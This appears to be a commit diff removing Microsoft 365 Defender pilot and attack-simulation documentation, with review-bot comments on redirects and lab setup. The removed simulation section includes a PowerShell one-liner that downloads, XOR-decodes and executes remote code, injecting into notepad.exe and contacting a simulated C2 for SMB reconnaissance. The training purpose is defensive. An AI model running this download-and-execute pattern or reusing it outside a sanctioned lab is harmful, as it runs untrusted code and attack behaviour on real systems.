- = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
- -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
- $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
- $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
- ```
-
- > [!NOTE]
- > If you open this document on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. Download this document and open it on Adobe Reader.
-
-4. At the prompt, paste and run the copied script.
-
-> [!NOTE]
-> If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the **CTRL-V** hotkey or right-click-paste method might not work. Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.
-
-A few seconds later, <i>notepad.exe</i> will open. A simulated attack code will be injected into notepad.exe. Keep the automatically generated Notepad instance open to experience the full scenario.
-
-The simulated attack code will attempt to communicate to an external IP address (simulating the C2 server) and then attempt reconnaissance against the domain controller through SMB.
-
-You'll see a message displayed on the PowerShell console when this script completes.
-
-```console
-ran NetSessionEnum against [DC Name] with return code result 0
-```
-
-To see the Automated Incident and Response feature in action, keep the notepad.exe process open. You'll see Automated Incident and Response stop the Notepad process.
-
-## Investigate an incident
-
-> [!NOTE]
-> Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bzwz?]
-
-Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft 365 Security Center portal.
-
-1. Open the [Microsoft 365 Security Center portal](https://security.microsoft.com/incidents) incident queue from any device.
-
-2. Navigate to **Incidents** from the menu.
-
- ![Screenshot of incidents as shown on the Microsoft 365 Security Center's left-hand side menu](../../media/mtp/fig1.png)
-
-3. The new incident for the simulated attack will appear in the incident queue.
-
- ![Screenshot of the incident queue](../../media/mtp/fig2.png)
-
-### Investigate the attack as a single incident
-
-Microsoft 365 Defender correlates analytics and aggregates all related alerts and investigations from different products into one incident entity. By doing so, Microsoft 365 Defender shows a broader attack story, allowing the SOC analyst to understand and respond to complex threats.
-
-The alerts generated during this simulation are associated with the same threat, and as a result, are automatically aggregated as a single incident.
-
-To view the incident:
-
-1. Navigate to the **Incidents** queue.
-
- ![Screenshot of incidents from the navigation menu](../../media/mtp/fig1.png)
-
-2. Select the newest item by clicking on the circle located left of the incident name. A side panel displays additional information about the incident, including all the related alerts. Each incident has a unique name that describes it based on the attributes of the alerts it includes.
-
- ![Screenshot of the incidents page where generated alerts are aggregated during the simulation](../../media/mtp/fig4.png)
-
- The alerts that show in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Cloud App Security, Microsoft Defender for Endpoint, Microsoft 365 Defender, and Microsoft Defender for Office 365.
-
-3. Select **Open incident page** to get more information about the incident.
-
- In the **Incident** page, you can see all the alerts and information related to the incident. The information includes the entities and assets that are involved in the alert, the detection source of the alerts (Microsoft Defender for Identity, EDR), and the reason they were linked together. Reviewing the incident alert list shows the progression of the attack. From this view, you can see and investigate the individual alerts.
-
- You can also click **Manage incident** from the right-hand menu, to tag the incident, assign it to yourself, and add comments.
-
- ![Screenshot of where to click Manage incident](../../media/mtp/fig5a.png)
-
- ![Screenshot of the fields on the manage incident panel where you can tag the incident, assign it to yourself, and add comments](../../media/mtp/fig5b.png)
-
-### Review generated alerts
-
-Let's look at some of the alerts generated during the simulated attack.
-
-> [!NOTE]
-> We'll walk through only a few of the alerts generated during the simulated attack. Depending on the version of Windows and the Microsoft 365 Defender products running on your test device, you might see more alerts that appear in a slightly different order.
-
-![Screenshot of generated alerts](../../media/mtp/fig6.png)
-
-#### Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint EDR)
-
-Advanced attackers use sophisticated and stealthy methods to persist in memory and hide from detection tools. One common technique is to operate from within a trusted system process rather than a malicious executable, making it hard for detection tools and security operations to spot the malicious code.
-
-To allow the SOC analysts to catch these advanced attacks, deep memory sensors in Microsoft Defender for Endpoint provide our cloud service with unprecedented visibility into a variety of cross-process code injection techniques. The following figure shows how Defender for Endpoint detected and alerted on the attempt to inject code to <i>notepad.exe</i>.
-
-![Screenshot of the alert for injection of potentially malicious code](../../media/mtp/fig7.png)
-
-#### Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint EDR)
-
-Microsoft Defender for Endpoint detections often target the most common attribute of an attack technique. This method ensures durability and raises the bar for attackers to switch to newer tactics.
-
-We employ large-scale learning algorithms to establish the normal behavior of common processes within an organization and worldwide and watch for when these processes show anomalous behaviors. These anomalous behaviors often indicate that extraneous code was introduced and are running in an otherwise trusted process.
-
-For this scenario, the process <i>notepad.exe</i> is exhibiting abnormal behavior, involving communication with an external location. This outcome is independent of the specific method used to introduce and execute the malicious code.
-
-> [!NOTE]
-> Because this alert is based on machine-learning models that require additional backend processing, it might take some time before you see this alert in the portal.
-
-Notice that the alert details include the external IP addressΓÇöan indicator that you can use as a pivot to expand investigation.
-
-Select the IP address in the alert process tree to view the IP address details page.
-
-![Screenshot of the alert for unexpected behavior by a process run with no command line arguments](../../media/mtp/fig8.png)
-
-The following figure displays the selected IP Address details page (clicking on IP address in the Alert process tree).
-![Screenshot of the IP address details page](../../media/mtp/fig9.png)
-
-#### Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)
-
-Enumeration using Server Message Block (SMB) protocol enables attackers to get recent user logon information that helps them move laterally through the network to access a specific sensitive account.
-
-In this detection, an alert is triggered when the SMB session enumeration runs against a domain controller.
-
-![Screenshot of the Microsoft Defender for Identity alert for User and IP address reconnaissance](../../media/mtp/fig10.png)
-
-### Review the device timeline [Microsoft Defender for Endpoint]
-
-After exploring the various alerts in this incident, navigate back to the incident page you investigated earlier. Select the **Devices** tab in the incident page to review the devices involved in this incident as reported by Microsoft Defender for Endpoint and Microsoft Defender for Identity.
-
-Select the name of the device where the attack was conducted, to open the entity page for that specific device. In that page, you can see alerts that were triggered and related events.
-
-Select the **Timeline** tab to open the device timeline and view all events and behaviors observed on the device in chronological order, interspersed with the alerts raised.
-
-![Screenshot of the device timeline with behaviors](../../media/mtp/fig11.png)
-
-Expanding some of the more interesting behaviors provides useful details, such as process trees.
-
-For example, scroll down until you find the alert event **Suspicious process injection observed**. Select the **powershell.exe injected to notepad.exe process** event below it, to display the full process tree for this behavior under the **Event entities** graph on the side pane. Use the search bar for filtering if necessary.
-
-![Screenshot of the process tree for selected PowerShell file creation behavior](../../media/mtp/fig12.png)
-
-### Review the user information [Microsoft Cloud App Security]
-
-On the incident page, select the **Users** tab to display the list of users involved in the attack. The table contains additional information about each user, including each user's **Investigation Priority** score.
-
-Select the user name to open the user's profile page where further investigation can be conducted. [Read more about investigating risky users](/cloud-app-security/tutorial-ueba#identify).
-
-![Screenshot of Cloud App Security user page](../../media/mtp/fig13.png)
-
-## Automated investigation and remediation
-
-> [!NOTE]
->Before we walk you through this simulation, watch the following video to get familiar with what automated self-healing is, where to find it in the portal, and how it can help in your security operations:
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4BzwB]
-
-Navigate back to the incident in the Microsoft 365 Security Center portal. The **Investigations** tab in the **Incident** page shows the automated investigations that were triggered by Microsoft Defender for Identity and Microsoft Defender for Endpoint. The screenshot below displays only the automated investigation triggered by Defender for Endpoint. By default, Defender for Endpoint automatically remediates the artifacts found in the queue, which requires remediation.
-
-![Screenshot of automated investigations related to the incident](../../media/mtp/fig14.png)
-
-Select the alert that triggered an investigation to open the **Investigation details** page. You'll see the following details:
--- Alert(s) that triggered the automated investigation.-- Impacted users and devices. If indicators are found on additional devices, these additional devices will be listed as well.-- List of evidence. The entities found and analyzed, such as files, processes, services, drivers, and network addresses. These entities are analyzed for possible relationships to the alert and rated as benign or malicious.-- Threats found. Known threats that are found during the investigation.-
-> [!NOTE]
-> Depending on timing, the automated investigation might still be running. Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. Refresh the **Investigation details** page to get the latest findings.
-
-![Screenshot of Investigation details page](../../media/mtp/fig15.png)
-
-During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.
-
-You can see <i>notepad.exe</i> disappear from the list of running processes on the test device.
-
-## Resolve the incident
-
-After the investigation is complete and confirmed to be remediated, close the incident.
-
-Select **Manage incident**. Set the status to **Resolve incident** and select the relevant classification.
-
-When the incident is resolved, it closes all of the associated alerts in Microsoft 365 Security Center and in the related portals.
-
-![Screenshot of the incidents page with the open Manage incident panel where you can click the switch to resolve incident](../../media/mtp/fig16.png)
-
-This wraps up the attack simulation for the incident management and automated investigation and remediation scenarios. The next simulation will take you through proactive threat hunting for potentially malicious files.
-
-## Advanced hunting scenario
-
-> [!NOTE]
-> Before we walk you through the simulation, watch the following video to understand the advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bp7O]
-
-### Hunting environment requirements
-
-There's a single internal mailbox and device required for this scenario. You'll also need an external email account to send the test message.
-
-1. Verify that your tenant has [enabled Microsoft 365 Defender](m365d-enable.md#confirm-that-the-service-is-on).
-2. Identify a target mailbox to be used for receiving email.
- a. This mailbox must be monitored by Microsoft Defender for Office 365
- b. The device from requirement 3 needs to access this mailbox
-3. Configure a test device:
- a. Make sure you are using Windows 10 version 1903 or later version.
- b. Join the test device to the test domain.
- c. [Turn on Windows Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see [this troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
- d. [Onboard to Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
-
-### Run the simulation
-
-1. From an external email account, send an email to the mailbox identified in step 2 of the test environment requirements section. Include an attachment that will be allowed through any existing email filter policies. This file does not need to be malicious or an executable. Suggested file types are <i>.pdf</i>, <i>.exe</i> (if allowed), or Office document such as a Word file.
-2. Open the sent email from the device configured as defined in step 3 of the test environment requirements section. Either open the attachment or save the file to the device.
-
-#### Go hunting
-
-1. Open the security.microsoft.com portal.
-
-2. Navigate to **Hunting > Advanced hunting**.
-
- ![Screenshot of advanced hunting in the M365 Security Center portal navigation bar](../../media/mtp/fig17.png)
-
-3. Build a query that starts by gathering email events.
-
- 1. From the query pane, select New.
-
- 1. Double-click on the EmailEvents table from the schema.
-
- ```console
- EmailEvents
- ```
-
- 1. Change the time frame to the last 24 hours. Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame.
-
- ![Screenshot of where you can change the time frame. Open the drop-down menu to choose from range of time frame options](../../media/mtp/fig18.png)
-
- 1. Run the query. You may have many results depending on the environment for the pilot.
-
- > [!NOTE]
- > See the next step for filtering options to limit data return.
-
- ![Screenshot of the advanced hunting query results](../../media/mtp/fig19.png)
-
- > [!NOTE]
- > Advanced hunting displays query results as tabular data. You can also opt to view the data in other format types such as charts.
-
- 1. Look at the results and see if you can identify the email you opened. It may take up to 2 hours for the message to show up in advanced hunting. If the email environment is large and there are many results, you might want to use the **Show Filters option** to find the message.
-
- In the sample, the email was sent from a Yahoo account. Click the **+** icon beside **yahoo.com** under the SenderFromDomain section and then click **Apply** to add the selected domain to the query. Use the domain or email account that was used to send the test message in step 1 of Run the Simulation to filter your results. Run the query again to get a smaller result set to verify that you see the message from the simulation.
-
- ![Screenshot of the filters. Use filters to narrow down the search, and find what you're looking for faster.](../../media/mtp/fig20.png)
-
- ```console
- EmailEvents
- | where SenderMailFromDomain == "yahoo.com"
- ```
-
- 1. Click the resulting rows from the query so you can inspect the record.
-
- ![Screenshot of the inspect record side panel which opens up when an advanced hunting result is selected](../../media/mtp/fig21.png)
-
-4. Now that you have verified that you can see the email, add a filter for the attachments. Focus on all emails with attachments in the environment. For this scenario, focus on inbound emails, not those that are being sent out from your environment. Remove any filters you have added to locate your message and add "| where **AttachmentCount > 0** and **EmailDirection** == **"Inbound""**
-
- The following query will show you the result with a shorter list than your initial query for all email events:
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- ```
-
-5. Next, include the information about the attachment (such as: file name, hashes) to your result set. To do so, join the **EmailAttachmentInfo** table. The common fields to use for joining, in this case are **NetworkMessageId** and **RecipientObjectId**.
-
- The following query also includes an additional line "| **project-rename EmailTimestamp=Timestamp**" that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- ```
-
-6. Next, use the **SHA256** value from the **EmailAttachmentInfo** table to find **DeviceFileEvents** (file actions that happened on the endpoint) for that hash. The common field here will be the SHA256 hash for the attachment.
-
- The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. The account name associated with the process will also be included.
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
- | where ActionType == "FileCreated"
- ```
-
- You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.
-
-7. Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the **FileProfile()** function enrichment:
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
- | where ActionType == "FileCreated"
- | distinct SHA1
- | invoke FileProfile()
- ```
-
-#### Create a detection
-
-Once you have created a query that identifies information that you'd like to **get alerted** about if they happen in the future, you can create a custom detection from the query.
-
-Custom detections will run the query according to the frequency you set, and the results of the queries will create security alerts, based on the impacted assets you choose. Those alerts will be correlated to incidents and can be triaged as any other security alert generated by one of the products.
-
-1. On the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click **Create detection rule**.
-
- ![Screenshot of where you can click create detection rule in the the advanced hunting page](../../media/mtp/fig22.png)
-
- > [!NOTE]
- > If you click **Create detection rule** and you have syntax errors in your query, your detection rule won't be saved. Double-check your query to ensure there's no errors.
-
-2. Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.
-
- ![Screenshot of the create detection rule page where you can define the alert details](../../media/mtp/fig23.png)
-
- Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert
-
-3. Select what entities are impacted in this alert. In this case, select **Device** and **Mailbox**.
-
- ![Screenshot of the create detection rule page where you can choose the parameters of the impacted entities](../../media/mtp/fig24.png)
-
-4. Determine what actions should take place if the alert is triggered. In this case, run an antivirus scan, though other actions could be taken.
-
- ![Screenshot of the create detection rule page where you can run an antivirus scan when an alert is triggered to help address threats](../../media/mtp/fig25.png)
-
-5. Select the scope for the alert rule. Since this query involve devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. When creating a custom detection that does not include devices as impacted entities, scope does not apply.
-
- ![Screenshot of the create detection rule page where you can set the scope for the alert rule manages your expectations for the results that you'll see](../../media/mtp/fig26.png)
-
- For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.
-
-6. Select **Create**. Then, select **Custom detection rules** from the navigation panel.
-
- ![Screenshot of Custom detection rules option in the menu](../../media/mtp/fig27a.png)
-
- ![Screenshot of the detection rules page which displays the rule and execution details](../../media/mtp/fig27b.png)
-
- From this page, you can select the detection rule, which will open a details page.
-
- ![Screenshot of the email attachments page where you can see the status of the rule execution, triggered alerts and actions, edit the detection, and so on](../../media/mtp/fig28.png)
-
-### Additional advanced hunting walk-through exercises
-
-To learn more about advanced hunting, the following webcasts will walk you through the capabilities of advanced hunting within Microsoft 365 Defender to create cross-pillar queries, pivot to entities and create custom detections and remediation actions.
-
-> [!NOTE]
-> Be prepared with your own GitHub account to run the hunting queries in your pilot test lab environment.
-
-|Title|Description|Download MP4|Watch on YouTube|CSL file to use|
-||||||
-|Episode 1: KQL fundamentals|We'll cover the basics of advanced hunting capabilities in Microsoft 365 Defender. Learn about available advanced hunting data and basic KQL syntax and operators.|[MP4](https://aka.ms/MTP15JUL20_MP4)|[YouTube](https://youtu.be/0D9TkGjeJwM)|[Episode 1: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%201%20-%20KQL%20Fundamentals.csl)|
-|Episode 2: Joins|We'll continue learning about data in advanced hunting and how to join tables together. Learn about inner, outer, unique, and semi joins, and the nuances of the default Kusto innerunique join.|[MP4](https://aka.ms/MTP22JUL20_MP4)|[YouTube](https://youtu.be/LMrO6K5TWOU)|[Episode 2: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%202%20-%20Joins.csl)|
-|Episode 3: Summarizing, pivoting, and visualizing data|Now that we're able to filter, manipulate, and join data, it's time to start summarizing, quantifying, pivoting, and visualizing. In this episode, we'll cover the summarize operator and some of the calculations you can perform while diving into additional tables in the advanced hunting schema. We turn our datasets into charts that can help improve analysis.|[MP4](https://aka.ms/MTP29JUL20_MP4)|[YouTube](https://youtu.be/UKnk9U1NH6Y)|[Episode 3: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%203%20-%20Summarizing%2C%20Pivoting%2C%20and%20Joining.csl)|
-|Episode 4: Let's hunt! Applying KQL to incident tracking|Time to track some attacker activity! In this episode, we'll use our improved understanding of KQL and advanced hunting in Microsoft 365 Defender to track an attack. Learn some of the tips and tricks used in the field to track attacker activity, including the ABCs of cybersecurity and how to apply them to incident response.|[MP4](https://aka.ms/MTP5AUG20_MP4)|[YouTube](https://youtu.be/2EUxOc_LNd8)|[Episode 4: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%204%20-%20Lets%20Hunt.csl)|
-|
-
-## Next step
-
-|![Closing and summary phase](../../medi)|Analyze your Microsoft 365 Defender pilot outcome, present them to your stakeholders, and take the next step.
-|:--|:--|
security M365d Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-pilot.md
- Title: Run your pilot Microsoft 365 Defender project
-description: Run your pilot Microsoft 365 Defender project in production to effectively determine the benefits and adoption of Microsoft 365 Defender.
-keywords: Microsoft 365 Defender pilot, run pilot Microsoft 365 Defender project, evaluate Microsoft 365 Defender in production, Microsoft 365 Defender pilot project, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-overview
- - m365solution-pilotmtpproject
---
-# Run your pilot Microsoft 365 Defender project
---
-**Applies to:**
-- Microsoft 365 Defender--
-This guide helps you run a pilot project by providing pointers to ensure you have a well-structured plan, guiding you through using the attack simulation feature, and finally concluding the pilot with key take-aways for you to reflect on and document results.
-
-![Phases in running a Microsoft 365 Defender pilot](../../media/pilotphases.png)
--
-Running a pilot helps you effectively determine the benefit of adopting Microsoft 365 Defender. Before enabling Microsoft 365 Defender in your production environment and starting your use cases, it's best to plan to determine the tasks to accomplish for your pilot project and set the success criteria.
--
-## How to use this pilot playbook
-
-This guide provides an overview of Microsoft 365 Defender and step-by-step instructions on how to set up your pilot project.
-
-Microsoft 365 Defender is a unified pre- and post-breach enterprise defense suite that natively coordinates protection, detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. It does so by combining and orchestrating the following capabilities into a single security solution:
--- Microsoft Defender for Endpoint (endpoints)-- Microsoft Defender for Office 365 (email)-- Microsoft Defender for Identity (identity)-- Microsoft Cloud App Security (apps)-
-![Image of_Microsoft 365 Defender solution for users, Microsoft Defender for Identity, for endpoints Microsoft Defender for Endpoint, for cloud apps, Microsoft Cloud App Security, and for data, Microsoft Defender for Office 365](../../media/mtp/m365pillars.png)
-
-With the integrated Microsoft 365 Defender solution, security professionals can stitch together the threat signals that Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Identity, and Microsoft Cloud App Security receive, and determine the full scope and impact of the threat, how it entered the environment, what it's affected, and how it's currently impacting the organization. Microsoft 365 Defender takes automatic action to prevent or stop the attack and self-heal affected mailboxes, endpoints, and user identities. See the [Microsoft 365 Defender overview](microsoft-365-defender.md) for details.
-
-The following sample timeline varies depending on having the right resources in your environment. Some detections and workflows might need more learning time than the others.
-
-![Sample timeline in running a Microsoft 365 Defender pilot](../../media/phase-diagrams/pilot-phases.png)
-
-> [!IMPORTANT]
-> For optimum results, follow the pilot instructions as closely as possible.
-
-### Pilot playbook phases
-
-There are four phases in running a Microsoft 365 Defender pilot:
-
-|Phase | Description |
-|:-|:--|
-| [Planning](m365d-pilot-plan.md)<br> ~ 1 day| Learn what you need to consider before running your Microsoft 365 Defender pilot project: <br><br>- Scope <br> - Use cases <br>- Requirements <br>- Test plan <br> - Success criteria <br> - Scorecard
-| [Preparation](m365d-evaluation.md) <br>~2 days| Access Microsoft 365 Security Center to set up your Microsoft 365 Defender pilot environment. You'll be guided to:<br><br>- Identify stakeholders and seek sign-off for your pilot <br> - Environment considerations <br>- Access <br>- Azure Active Directory setup <br> - Configuration order <br> - Sign up for Microsoft 365 E5 Trial <br> - Configure domain <br>- Assign Microsoft 365 E5 licenses <br> - Complete the setup wizard in the portal|
-| [Attack simulation](m365d-pilot-simulate.md) <br>~2 days| To simulate an attack, you'll be guided to:<br><br>- Verify the test environment requirements <br>- Run the simulation <br>- Investigate an incident <br>- resolve the incident
-| [Closing and summary](m365d-pilot-close.md) <br>~ 1 day| When you've reached the end of the process, you'll be guided to:<br><br>- Go through your final output<br>- Present your output to your stakeholders <br>- Provide feedback <br>- Take next steps
-
-## Next step
-
-|[Planning phase](m365d-pilot-plan.md) | Plan your Microsoft 365 Defender pilot project
-|:-|:--|
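Review bot: this deletes the whole pilot playbook, including the phase table that links to m365d-pilot-plan.md, m365d-evaluation.md, m365d-pilot-simulate.md and m365d-pilot-close.md, but nothing in the hunk adds a redirect. The setup page changed in this same update points readers to a new guide, `[Evaluate and pilot Microsoft 365 Defender](eval-overview.md)`; add a redirect entry from this page (and from the four phase pages if they are retired with it) to that guide so existing bookmarks and cross-links, such as the "Next step" row pointing at m365d-pilot-plan.md, do not break.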
security Prepare M365d Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/prepare-m365d-eval.md
- Title: Prepare your Microsoft 365 Defender trial lab environment
-description: Prepare stakeholder sign-off, timelines, environment considerations, and adoption order when setting up your Microsoft 365 Defender trial lab or pilot environment
-keywords: Microsoft 365 Defender trial prep, Microsoft 365 Defender pilot prep, prep for running a Microsoft 365 Defender pilot project, run a pilot Microsoft 365 Defender project, deploy, prepare, stakeholder, timeline, environment, endpoint, server, management, adoption
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-evalutatemtp
---
-# Prepare your Microsoft 365 Defender trial lab or pilot environment
---
-**Applies to:**
-- Microsoft 365 Defender-
-Creating a Microsoft 365 Defender trial lab or pilot environment and deploying it is a three-phase process:
-
-|![Phase 1: Prepare](../../medi) |
-|--|--|--|--|
-|*You are here!* | || |
-
-You're currently in the preparation phase.
--
-Preparation is key to any successful deployment. This section will guide you through what you need to consider as you prepare to create a trial lab or pilot environment for your Microsoft 365 Defender deployment.
-
-## Prerequisites
-Learn about the licensing, hardware and software requirements, and other configuration settings to provision and use Microsoft 365 Defender. See the minimum requirements for [Microsoft 365 Defender](/microsoft-365/security/defender/prerequisites), [Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/minimum-requirements), [Microsoft Defender for Office 365](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description), [Microsoft Defender for Identity](/azure-advanced-threat-protection/atp-prerequisites), [Microsoft Cloud App Security](/azure-advanced-threat-protection/atp-prerequisites).
-
-## Stakeholders and sign-off
-Identify all the stakeholders that are involved in the project and who may need to sign-off, review, or stay informed, whether for evaluation or running a pilot project.
-
->[!NOTE]
->Not all organizations might have the security organization maturity to have such roles. In such case, consult with your leadership team on review and approval accountabilities.
-
-Add stakeholders
-to the table below as appropriate for your organization.
--- SO = Sign-off on this project--- R = Review this project and provide input--- I = Informed of this project-
-| Name | Role | Action |
-|-||--|
-| Enter name and email | **Chief Information Security Officer (CISO)** *An executive representative who serves as sponsor inside the organization for the new technology deployment.* | SO |
-| Enter name and email | **Head of Cyber Defense Operations Center (CDOC)** *A representative from the CDOC team in charge of defining how this change is aligned with the processes in the customers security operations team.* | SO |
-| Enter name and email | **Security Architect** *A representative from the Security team in charge of defining how this change is aligned with the core Security architecture in the organization.* | R |
-| Enter name and email | **Workplace Architect** *A representative from the IT team in charge of defining how this change is aligned with the core workplace architecture in the organization.* | R |
-| Enter name and email | **Security Analyst** *A representative from the CDOC team who can provide feedback on the detection capabilities, user experience, and overall usefulness of this change from a security operations perspective.* | I |
-
-## Prepare your Azure Active Directory
-Skip this step if you have already enabled synchronization between Active Directory and Azure Active Directory on premises. Review existing best practices documentation from Azure Active Directory. The following steps are optimized to evaluate or run a pilot Microsoft 365 Defender project.
-
-1. Go to the [Azure Active Directory](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade) portal > **Azure AD Connect**.
-![Image of Azure Active Directory portal page](../../media/mtp-eval-1.png) <br>
-
-2. Click **Download** from **Microsoft Azure Active Directory Connect** and transfer it to your Domain Controller.
-![Image of Azure Active Directoru Connect download page](../../media/mtp-eval-2.png) <br>
-
-3. On the domain controller, follow the Azure Active Directory Connect wizard. Read the license terms and privacy notice and select the checkbox if you agree. Click **Continue**.
-![Image of Azure AD Connect welcome page](../../media/mtp-eval-3.png) <br>
-
-4. Navigate to **Express Settings**.
-![Image of Express Settings page](../../media/mtp-eval-4.png) <br>
-
-5. Enter your global administrator credentials. Click **Next**.
-![Image of Connect to Azure AD page where you should enter your global administrator credentials](../../media/mtp-eval-5.png) <br>
-
-6. Enter your Active Directory Domain Services enterprise administrator credentials. Click **Next**.
-![Image of Connect to AD DS page where you should enter your credentials](../../media/mtp-eval-6.png) <br>
-
-7. Click **Install** to confirm the configuration.
-![Image of configuration confirmation page](../../media/mtp-eval-7.png) <br>
-
-8. Congratulations, you have successfully configured Azure Active Directory Connect.
-![Image of a successfully configured Azure Active Directory Connect page](../../media/mtp-eval-8.png) <br>
-
-You can now [add users and groups to Active Directory](/azure-advanced-threat-protection/atp-playbook-setup-lab#bkmk_hydrate) and [configure a SAM-R policy](/azure-advanced-threat-protection/atp-playbook-setup-lab#configure-sam-r-capabilities-from-contosodc).
--
-## Configuration order
-The following table indicates the order Microsoft recommends for configuring the Microsoft 365 Defender components for your trial lab or pilot environment deployment.
-
-| Component | Description | Configuration order rank |
-|--|-||
-|Microsoft Defender for Office 365|Microsoft Defender for Office 365 safeguards your organization against malicious threats posed by email messages, links (URLs), and collaboration tools. <br> [Learn more.](/microsoft-365/security/office-365-security/defender-for-office-365) | 1 |
-|Microsoft Defender for Identity|Microsoft Defender for Identity uses Active Directory signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization. <br> [Learn more](/azure-advanced-threat-protection/).| 2 |
-|Microsoft Cloud App Security| Microsoft Cloud App Security is a Cloud Access Security Broker (CASB) that operates on multiple clouds. It provides rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats across all your cloud services. <br> [Learn more](/cloud-app-security/). |3 |
-|Microsoft Defender for Endpoint | Microsoft Defender for Endpoint endpoint detection and response capabilities provide advanced attack detections that are near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a breach, and take response actions to remediate threats. <br> [Learn more.](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection) |4 |
-
-## Next step
-|![Phase 2: Setup](../../medi) | Set up your Microsoft 365 Defender trial lab or pilot environment
-|:-|:--|
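Review bot: the Prerequisites paragraph being removed links Microsoft Cloud App Security to `/azure-advanced-threat-protection/atp-prerequisites`, the same Defender for Identity page used for the preceding entry, and both phase banners reference a truncated image path `../../medi`; if this material is migrated into the replacement guide, fix those rather than copying them forward. The Azure AD walkthrough is the part worth a second look before reuse: steps 2 through 7 have the reader copy Azure AD Connect to a domain controller, choose Express Settings, and enter global administrator and enterprise administrator credentials, with no mention of a dedicated member server, a dedicated sync account, or tearing the trial setup down afterwards. That is acceptable for a throwaway lab, and the text should say so explicitly so the same steps are not repeated against a production forest.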
security Setup M365deval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/setup-m365deval.md
